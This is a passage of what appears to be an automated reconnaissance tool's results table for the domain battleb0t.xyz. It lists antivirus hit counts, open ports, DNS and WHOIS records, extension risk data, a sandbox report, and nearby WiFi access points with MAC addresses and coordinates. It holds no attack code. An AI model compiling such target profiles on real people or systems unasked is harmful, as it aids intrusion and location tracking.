File SHA256: 524180810d0b9764e5ef3923a8eb34b2ed8ca1923244be37e94ca57d889ede9b (AV positives: 56/75 scanned on 08/12/2022 02:05:05)\n File SHA256: 782eda6bdf7c6cb6067637f06c9a69c3fda5e4d6efbf7a744bc1b7574311d6ca (AV positives: 26/75 scanned on 07/31/2022 23:13:31)\n File SHA256: 53b6bcc44935e6141356b24f7e68b4970457269119a206c0a0b5d731f2e556d4 (AV positives: 6/74 scanned on 07/31/2022 22:52:37)\n File SHA256: f257c984bab34903c697dcd9eda861735efa9b2e4b9165b40468113acde4695c (AV positives: 24/75 scanned on 07/26/2022 23:14:08)\n Found malicious artifacts related to "96.6.31.32": ...\n\n URL: http://aka.ms/ioavtest (AV positives: 4/88 scanned on 08/12/2022 22:59:26)\n URL: http://96.6.31.32/ (AV positives: 1/87 scanned on 07/14/2022 13:54:58)\n URL: http://aka.ms/ioavtest/ (AV positives: 4/87 scanned on 06/30/2022 23:36:06)\n URL: https://aka.ms/ioavtest (AV positives: 3/93 scanned on 05/29/2022 1 | 34.148.97.127 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom (Net ID: 00:0C:F6:6E:18:20) | 50.8897, 6.0563 |
| 2023-05-12 02:45:52 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 37.751, -97.822 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8880 | 172.67.168.252 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.108.153 | www.battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 2 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2023-03-25T07:00:34Z
Creation Date: 2014-09-27T01:11:37Z
Registrar Registration Expiration Date: 2032-09-27T01:11:37Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflaressl.com
Name Server: ns1.cloudflaressl.com
Name Server: ns2.cloudflaressl.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:44Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflaressl.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:B4:05) | 37.780462,-122.390564 |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.110 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitecgameuser (Net ID: 00:01:8E:15:D4:A7) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.111.153 | battleb0t.xyz |
| 2023-05-12 02:44:52 | Raw Data from RIRs | No | CRXcavator | 1 | 0 | 1 | 0 | None | [{"platform": "Chrome", "version": "1.0", "data": {"entrypoints": {"chrome.cookies.get": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [53, 110], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [36, 113], "/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/redirect.js": [18, 78, 144]}, "chrome.tabs.query": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/service-worker.js": [253]}, "chrome.runtime.onMessage": {"/tmp/fcnbnbmppjiehikhcaalfjmopkpfaeji_1.0/options.js": [173]}}, "risk": {"webstore": {"total": 8, "last_updated": 5, "support_site": 1, "rating_users": 1, "users": 1}, "metadata": {}, "total": 460, "csp": {"script-src": 1, "total": 377, "object-src": 1}, "permissions": {"total": 75}}, "extcalls": ["https://fonts.googleapis.com/css?family=Baloo+Bhaina+2|Roboto&display=swap", "https://dayhub.co", "https://gokanto.com/dayhub/getUserProfileData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co?action=signUp", "https://gokanto.com/dayhub/signIn", "https://dayhub.co", "https://dayhub.co/app", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData", "https://dayhub.co/app?action=editTasks", "https://dayhub.co/app?action=editSchedule", "https://dayhub.co/app?action=editSites", "https://dayhub.co", "https://gokanto.com/dayhub/getUserData"], "related": {"nngceckbapebfimnlniiiahkandclblb": {"rating": 4.7743354, "users": 3000000, "platform": "", "short_description": "A secure and free password manager for all of your devices.", "icon": "https://lh3.googleusercontent.com/J_l8abQyJgx7POjRoDfGaFYWFnYQNpRSy4kH5IlbwSdM-l_gZf2rJlk2NLSQTY8g-U2vrclpb0EZApHyOe6sjzbKcUc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5229, "name": "Bitwarden - Free Password Manager"}, "gbkeegbaiigmenfmjfclcdgdpimamgkj": {"rating": 3.6818337, "users": 6000000, "platform": "", "short_description": "View and edit Microsoft Word, Excel, and PowerPoint files with Google Docs, Sheets, and Slides", "icon": "https://lh3.googleusercontent.com/nM9DoYWOXecxYlD9b43JTgmjpsSaIAKJ_wHz3fAHysYl_bsVSVVANozLm6dlMVEJ7ZYXx-wydY1IfePdBbjNSQw4=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 5824, "name": "Office Editing for Docs, Sheets & Slides"}, "ohahllgiabjaoigichmmfljhkcfikeof": {"rating": 4.8292074, "users": 1000000, "platform": "", "short_description": "Free and improved AdBlocker. Completely remove ALL ads. No \"acceptable\" ads or whitelisted advertisers, block tracking and malware!", "icon": "https://lh3.googleusercontent.com/AsZW_M_1Unw6wZ0r-Th6HP1bSgo3odQg2jvmPN8z01RUGIli-YLnZwGdqpdjUY_pgFaQW4zgeq9vADQ-S8q1Jq6g7Dw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 47584, "name": "AdBlocker Ultimate"}, "lpcaedmchfhocbbapmcbpinfpgnhiddi": {"rating": 4.0977564, "users": 8000000, "platform": "", "short_description": "Save to Google Keep in a single click!", "icon": "https://lh3.googleusercontent.com/PX16LKTye9cVfZTehEpKSUQgntIvmjuvkh4kWF55rTIYMsdmYZiuZFJq-0ONQHueFpToU4HBlvGS8b_hdQhNhH7OfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 7621, "name": "Google Keep Chrome Extension"}, "kgjfgplpablkjnlkjmjdecgdpfankdle": {"rating": 3.891328, "users": 8000000, "platform": "", "short_description": "Schedule Zoom meetings directly from Google Calendar", "icon": "https://lh3.googleusercontent.com/EtDJ1WOrJu9vJxqUpk67gAWSsvf7llrIu3UIxOVFQMS6BIxdN3fKOe0NBBHDxVS6G5ov4yxKcxAELtkfhBLMlO7r1Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 911, "name": "Zoom Scheduler"}, "laookkfknpbbblfpciffpaejjkokdgca": {"rating": 4.4679146, "users": 3000000, "platform": "", "short_description": "Replace new tab page with a personal dashboard to help you get focused, stay organized, and keep motivated to achieve your goals.", "icon": "https://lh3.googleusercontent.com/H9tXckFzG4jZjM5Ag6gvBl0dCm75uQIlextzqmubbZ4stRiSfAyRG6pna-QjMk4S5kOCeShmPMcWxlPPdKlQyDqW=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13838, "name": "Momentum"}, "gmbmikajjgmnabiglmofipeabaddhgne": {"rating": 3.9548225, "users": 7000000, "platform": "", "short_description": "Save web content or screen capture directly to Google Drive.", "icon": "https://lh3.googleusercontent.com/TFO5gDBZMhZOyeKAozOLYsxulAwh_RT7qY3vdqKt_8NTMWQjSNRLFc9CjPdkC2MSPimqwSB__nG24HKw4Y1hMdtLLw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4759, "name": "Save to Google Drive"}, "cjpalhdlnbpafiamejdnhcphjbkeiagm": {"rating": 4.6761365, "users": 10000000, "platform": "", "short_description": "Finally, an efficient blocker. Easy on CPU and memory.", "icon": "https://lh3.googleusercontent.com/rrgyVBVte7CfjjeTU-rCHDKba7vtq-yn3o8-10p5b6QOj_2VCDAO3VdggV5fUnugbG2eDGPPjoJ9rsiU_tUZBExgLGc=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 26400, "name": "uBlock Origin"}, "dagcmkpagjlhakfdhnbomgmjdpkdklff": {"rating": 2.7953382, "users": 2000000, "platform": "", "short_description": "Fast, convenient import of references and PDFs to your Mendeley Reference Manager library.", "icon": "https://lh3.googleusercontent.com/n-KR5-ddPVwU7aEkQYUzyQ1di71jI51yOcMuDD-HBBzRxUSEoS1lie5K8Jydhj5pye21D-OOJqneqn0lB-IFxcoV=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1759, "name": "Mendeley Web Importer"}, "ljflmlehinmoeknoonhibbjpldiijjmm": {"rating": 4.430087, "users": 1000000, "platform": "", "short_description": "Read aloud any Google Doc, PDF, webpage, or book with text to speech (TTS). Natural sounding voices in 30+ languages & 130 voices.", "icon": "https://lh3.googleusercontent.com/aQsKQj8i_4KJsxjKTAzn_ACwmtVbM_p6Mxvh9LDlO-6dcScpIZqQUUxdztFPK0Ftgz7L2yTE6g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8482, "name": "Speechify Text to Speech Voice Reader"}, "flliilndjeohchalpbbcdekjklbdgfkk": {"rating": 4.1474295, "users": 6000000, "platform": "", "short_description": "Your surfing made private and secure", "icon": "https://lh3.googleusercontent.com/hjQv8jaFVCyh3Df1rAM6LTeuBY0wOxZAESgsLsysTHGOCQHt5XZP_44v5HM-xIjv-1gVTUHaehBTrF2hoqNcS5RFXK0=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2937, "name": "Avira Browser Safety"}, "pgjjikdiikihdfpoppgaidccahalehjh": {"rating": 4.414451, "users": 2000000, "platform": "", "short_description": "Take a Speedtest directly from your toolbar to quickly test your internet performance without interruption.", "icon": "https://lh3.googleusercontent.com/UeJDiqRqbe61ZwRA-nshMyadO7gt5igLJN5jGy3he_VVP5iELduwit3AdBk9gTnCiDzDIQtlUJv6mQ-V7_7azrShxQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2934, "name": "Speedtest by Ookla"}, "gpdjojdkbbmdfjfahjcgigfpmkopogic": {"rating": 3.558845, "users": 7000000, "platform": "", "short_description": "Save your favorite ideas online so you can easily get back to them later.", "icon": "https://lh3.googleusercontent.com/RHxJoFYLUtCLDgNV64uYMTgTu6NeJpmyV5zAGPcm2H7-WeKEDiDjOsbmpCHhTwhqishCR70OZgXUBWXiyimTTRP7=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 9559, "name": "Pinterest Save Button"}, "noaijdpnepcgjemiklgfkcfbkokogabh": {"rating": 4.390603, "users": 1000000, "platform": "", "short_description": "Translator, Dictionary, Voice", "icon": "https://lh3.googleusercontent.com/5BdJZ8RtA9D8gzY63BejGvZ7Av5RX0iYXYJ0Gv8yoXwK0Qs4vQvafb7eEmfknWvQVU6zGsDw7cs-hxvBJkpuW4Go=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4959, "name": "ImTranslator: Translator, Dictionary, TTS"}, "aapbdbdomjkkjkaonfhkkikfgjllcleb": {"rating": 4.349156, "users": 10000000, "platform": "", "short_description": "View translations easily as you browse the web. By the Google Translate team.", "icon": "https://lh3.googleusercontent.com/3ZU5aHnsnQUl9ySPrGBqe5LXz_z9DK05DEfk10tpKHv5cvG19elbOr0BdW_k8GjLMFDexT2QHlDwAmW62iLVdek--Q=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 42113, "name": "Google Translate"}, "ihcjicgdanjaechkgeegckofjjedodee": {"rating": 4.053508, "users": 9000000, "platform": "", "short_description": "The fastest and safest web browsing experience.", "icon": "https://lh3.googleusercontent.com/UZPt17v_WaxXDY5u3x8NTx-hQmNVGmOaPSANAWNirF_moQIRGBbRBtKzjl07YWUDlRwGyYUtORJxH7zbgqStxU6utOQ=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 841, "name": "Malwarebytes Browser Guard"}, "dhdgffkkebhmkfjojejmpbldmpobfkfo": {"rating": 4.7285094, "users": 10000000, "platform": "", "short_description": "The world's most popular userscript manager", "icon": "https://lh3.googleusercontent.com/zoY8FwoOqPlBgFxcmFdNSK2Q4CcLmv-gw7vTjF2KMR9cEabwBsGNrHBTEMitn0Ba6OmCVJ0NcLnFGu3N97BP8Phu0g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 70345, "name": "Tampermonkey"}, "kbmfpngjjgdllneeigpgjifpgocmfgmb": {"rating": 4.7316957, "users": 1000000, "platform": "", "short_description": "A suite of modules that enhance your Reddit browsing experience", "icon": "https://lh3.googleusercontent.com/0SvxWpFT-d9CLNWqKIjV7_2jOtnBpU8tXCPPqWTr_MvlaFkKlAm5CDpo1uDX1SXWVnrrninjuGsjhF02MDVHWXb3=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 4234, "name": "Reddit Enhancement Suite"}, "ohlencieiipommannpdfcmfdpjjmeolj": {"rating": 4.356376, "users": 1000000, "platform": "", "short_description": "Print Friendly and PDF any Webpage", "icon": "https://lh3.googleusercontent.com/Qg5OD-OnjHXNseuZny1yLGGLdzUjUpxxwf0WHcN28yfpxoOFn17i6a4JIihquQxUA4pp58-UFuiJdEvcIYgdGvDvgw=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2329, "name": "Print Friendly & PDF"}, "ndnaehgpjlnokgebbaldlmgkapkpjkkb": {"rating": 4.4497366, "users": 2000000, "platform": "", "short_description": "Email tracker for Gmail & Mail Merge with over 2 million active users. Free and unlimited email tracking.", "icon": "https://lh3.googleusercontent.com/-Qbe0s3I6huZBX4FZbwghJS-NQhR92K0HFmkcz9XxzDYrEjLq4Ig_xKbDk-Jrh2JhSZA5kwJYC74NXcWFEIDeBHH=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11191, "name": "Email Tracker for Gmail, Mail Merge-Mailtrack"}, "cmeakgjggjdlcpncigglobpjbkabhmjl": {"rating": 4.101554, "users": 1000000, "platform": "", "short_description": "Improving Steam. Items auto-selling. Lowest prices for games and items. Prices from different sources. And a lot more", "icon": "https://lh3.googleusercontent.com/CadrS32EDKBEsKQlULmRC8QFkSwq3Cht4KLP86K6zgeaeJIVipdaQyLAv-UIyi63qFx8GbvnvrptvmxBtfSecWGV-g=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 8882, "name": "Steam Inventory Helper"}, "caljgklbbfbcjjanaijlacgncafpegll": {"rating": 3.9023256, "users": 5000000, "platform": "", "short_description": "Avira Password Manager saves, manages, and syncs all your passwords across all your d | ayhu.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2091 | 87.248.157.102 |
| 2023-05-12 02:45:34 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 24, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://185.199.111.153/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6108:304:WilStaging_02"\n "SM0:6108:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:6108:120:WilError_01"\n "SM0:6108:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "138.91.254.96:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET / HTTP/1.1\nHost: 185.199.111.153\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "githubstatus.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\nurturing\\campaign_history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\top sites"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge shopping\\2.0.2353.0\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge shopping\\2.0.2353.0\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sessions\\tabs_13322933142474011"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\shopping.js]- [targetUID: 00000000-00004160]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00004160]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir4160_527063389\\Ruleset Data]- [targetUID: 00000000-00004160]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: 00000000-00004160]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\4160_1524879678\\edge_driver.js]- [targetUID: 00000000-00004160]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_driver.js]- [targetUID: 00000000-00004160]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: 00000000-00004160]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4160_246087038\\Filtering Rules]- [targetUID: 00000000-00004160]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00004160]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\4160_1524879678\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00004160]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004160]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4160_650092276\\product_page.js]- [targetUID: 00000000-00004160]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very 